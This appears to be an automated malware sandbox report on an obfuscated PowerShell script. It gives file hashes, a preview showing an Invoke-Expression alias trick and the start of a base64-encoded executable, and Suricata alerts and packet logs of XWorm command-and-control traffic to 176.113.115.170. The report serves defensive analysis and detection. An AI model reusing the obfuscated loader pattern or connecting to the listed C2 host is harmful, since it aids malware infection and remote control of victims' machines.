                                        Preview:...................................FL..................F.".. ...J.S.......d..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...|)..d......d......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2+Z`H...........................^.A.p.p.D.a.t.a...B.V.1.....+Z]H..Roaming.@......EW<2+Z]H..../.....................q...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2+ZYH....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2+ZYH....2......................X.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2+ZYH....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2+ZYH....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2+ZbH....u...........

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8JX3M02ZEKXIEXZFPGMS.temp

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6224
                                        Entropy (8bit):3.7302356953824454
                                        Encrypted:false
                                        SSDEEP:48:EByDC0lgtrt3CyeU2UG/rukvhkvklCyw/xWlflHJb7SogZobRWlflub7SogZo31:rCRt3C8ThkvhkvCCt5Wlf+H2WlfzHc
                                        MD5:A4DA0F2125ECFDDB82AB308E616BB28B
                                        SHA1:8F45BC05113502D762F3A8C4B9BD1ABEC2D85F68
                                        SHA-256:975E09B64E375693C938A0B796B5BC0178FAC12CF9CD319C16E3A325B8D8A871
                                        SHA-512:9F41857FA5A94A2468C4770E3F444E8C42CAC5A37A370CF60006D0F23955BB3E806ACF59FEE6D0806A4A631938579A5B1649BBDC1E69BE8313BCBCFD6B6BE734
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ...J.S.......d..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...|)..d......d......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2+Z`H...........................^.A.p.p.D.a.t.a...B.V.1.....+Z]H..Roaming.@......EW<2+Z]H..../.....................q...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2+ZYH....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2+ZYH....2......................X.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2+ZYH....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2+ZYH....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2+ZbH....u...........

                                        Static File Info

                                        General

                                        File type:ASCII text, with very long lines (65483), with CRLF line terminators
                                        Entropy (8bit):5.168080453235707
                                        TrID:
                                          File name:176.113.115.170.ps1
                                          File size:198'520 bytes
                                          MD5:be3bf7a258359bd7c14c47b3872c9531
                                          SHA1:be71f346690b8f384961bf73b382181c5959aef6
                                          SHA256:ef9aeef4f3b7ea00add3168043c866716d72353065d95b7b7dd981641d91f1ae
                                          SHA512:db1933ebf7c6d98c5a622a3e22bae0ecde77b554c781574e3e5be159677be3269de15cdb1d0b19002374debfa9d1d2ef6ba663e7daa44ea181ee47c9600e68a5
                                          SSDEEP:6144:kkYzSm2MYa1Qdgzkqs5u0uXrRMnfB3sBVy8ZK5HKceYWQLJgvF/9EoQ6GsbwMI5M:brSASP
                                          TLSH:28147C320203BCCA977F3F49A9442EA10C5C643BABA59198FEC509BD65BB510DF39DB4
                                          File Content Preview:.. $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAAAAAOA

                                          File Icon

                                          Icon Hash:3270d6baae77db44

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2025-01-11T10:03:15.710239+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:03:15.710239+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:03:23.606303+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:03:23.819884+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:03:23.833659+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:03:37.285229+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:03:37.287933+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:03:45.707942+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:03:50.755229+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:03:50.757217+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:04.223272+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:04.226679+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:15.728135+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:17.693170+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:17.694906+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:19.363812+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:19.367649+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:19.485113+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:19.487034+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:30.848378+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:30.855002+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:39.832693+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:39.835523+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:45.348369+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:45.351079+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:45.732510+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:47.586686+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:47.588963+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:49.945635+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:49.949996+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:50.075448+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:50.089397+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:50.196498+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:50.203852+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:04:55.313184+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:04:55.315587+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:01.272151+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:01.274287+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:01.395541+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:01.397754+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:07.723496+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:07.725209+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:15.747681+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:21.197542+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:21.199697+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:24.708086+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:24.710811+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:28.051668+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:28.064303+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:33.464028+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:33.465784+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:34.149677+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:34.154960+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:45.767809+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:47.613889+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:47.615192+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:05:55.274630+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:05:55.404050+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:06.379585+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:06.384569+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:15.784852+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:19.851542+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:19.852832+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:33.133470+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:33.347246+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:33.411931+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:43.801919+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:43.803194+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:45.797759+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:47.383427+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:47.385515+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:47.554173+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:47.555629+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:47.846791+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:47.848083+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:48.222026+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:48.227167+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:51.492933+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:51.610033+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:52.317426+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:52.319100+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:53.489179+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:53.490802+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:53.609907+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:53.611322+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:06:55.380815+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:06:55.382570+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:07:00.584845+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:07:00.587025+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:07:04.006405+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:07:04.007680+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:07:04.133440+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:07:04.134457+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:07:04.250902+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:07:04.255218+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:07:04.375196+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:07:04.383325+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:07:04.831267+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:07:04.833348+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP
                                          2025-01-11T10:07:10.590896+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704413192.168.2.649718TCP
                                          2025-01-11T10:07:10.591417+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649718176.113.115.1704413TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 11, 2025 10:03:10.037578106 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:10.042766094 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:10.042855978 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:10.146197081 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:10.151238918 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:15.710238934 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:15.759319067 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:23.606302977 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:23.611243010 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:23.819884062 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:23.833658934 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:23.838546038 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:34.860683918 CET5784653192.168.2.6162.159.36.2
                                          Jan 11, 2025 10:03:34.865518093 CET5357846162.159.36.2192.168.2.6
                                          Jan 11, 2025 10:03:34.865591049 CET5784653192.168.2.6162.159.36.2
                                          Jan 11, 2025 10:03:34.870461941 CET5357846162.159.36.2192.168.2.6
                                          Jan 11, 2025 10:03:35.329504967 CET5784653192.168.2.6162.159.36.2
                                          Jan 11, 2025 10:03:35.334599972 CET5357846162.159.36.2192.168.2.6
                                          Jan 11, 2025 10:03:35.334683895 CET5784653192.168.2.6162.159.36.2
                                          Jan 11, 2025 10:03:37.072319984 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:37.077152967 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:37.285228968 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:37.287933111 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:37.292695999 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:45.707942009 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:45.759411097 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:50.542110920 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:50.547307014 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:50.755228996 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:03:50.757216930 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:03:50.762196064 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:04.010041952 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:04.015341043 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:04.223272085 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:04.226679087 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:04.231610060 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:15.728135109 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:15.775075912 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:17.478887081 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:17.483834028 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:17.693170071 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:17.694905996 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:17.699764013 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:19.150398016 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:19.155417919 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:19.212821960 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:19.217622995 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:19.363811970 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:19.367649078 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:19.372642040 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:19.485112906 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:19.487034082 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:19.491977930 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:30.634865046 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:30.639972925 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:30.848377943 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:30.855001926 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:30.860094070 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:39.619216919 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:39.624361992 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:39.832693100 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:39.835522890 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:39.840518951 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:45.134973049 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:45.140037060 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:45.348368883 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:45.351078987 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:45.355989933 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:45.732510090 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:45.924529076 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:47.369779110 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:47.374955893 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:47.586685896 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:47.588963032 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:47.593909025 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:49.729041100 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:49.733990908 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:49.853599072 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:49.858648062 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:49.886833906 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:49.891817093 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:49.945635080 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:49.949995995 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:49.995445013 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:50.075448036 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:50.089396954 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:50.094400883 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:50.196497917 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:50.203851938 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:50.208874941 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:55.088176012 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:04:55.093337059 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:55.313184023 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:04:55.315587044 CET497184413192.168.2.6176.113.115.170
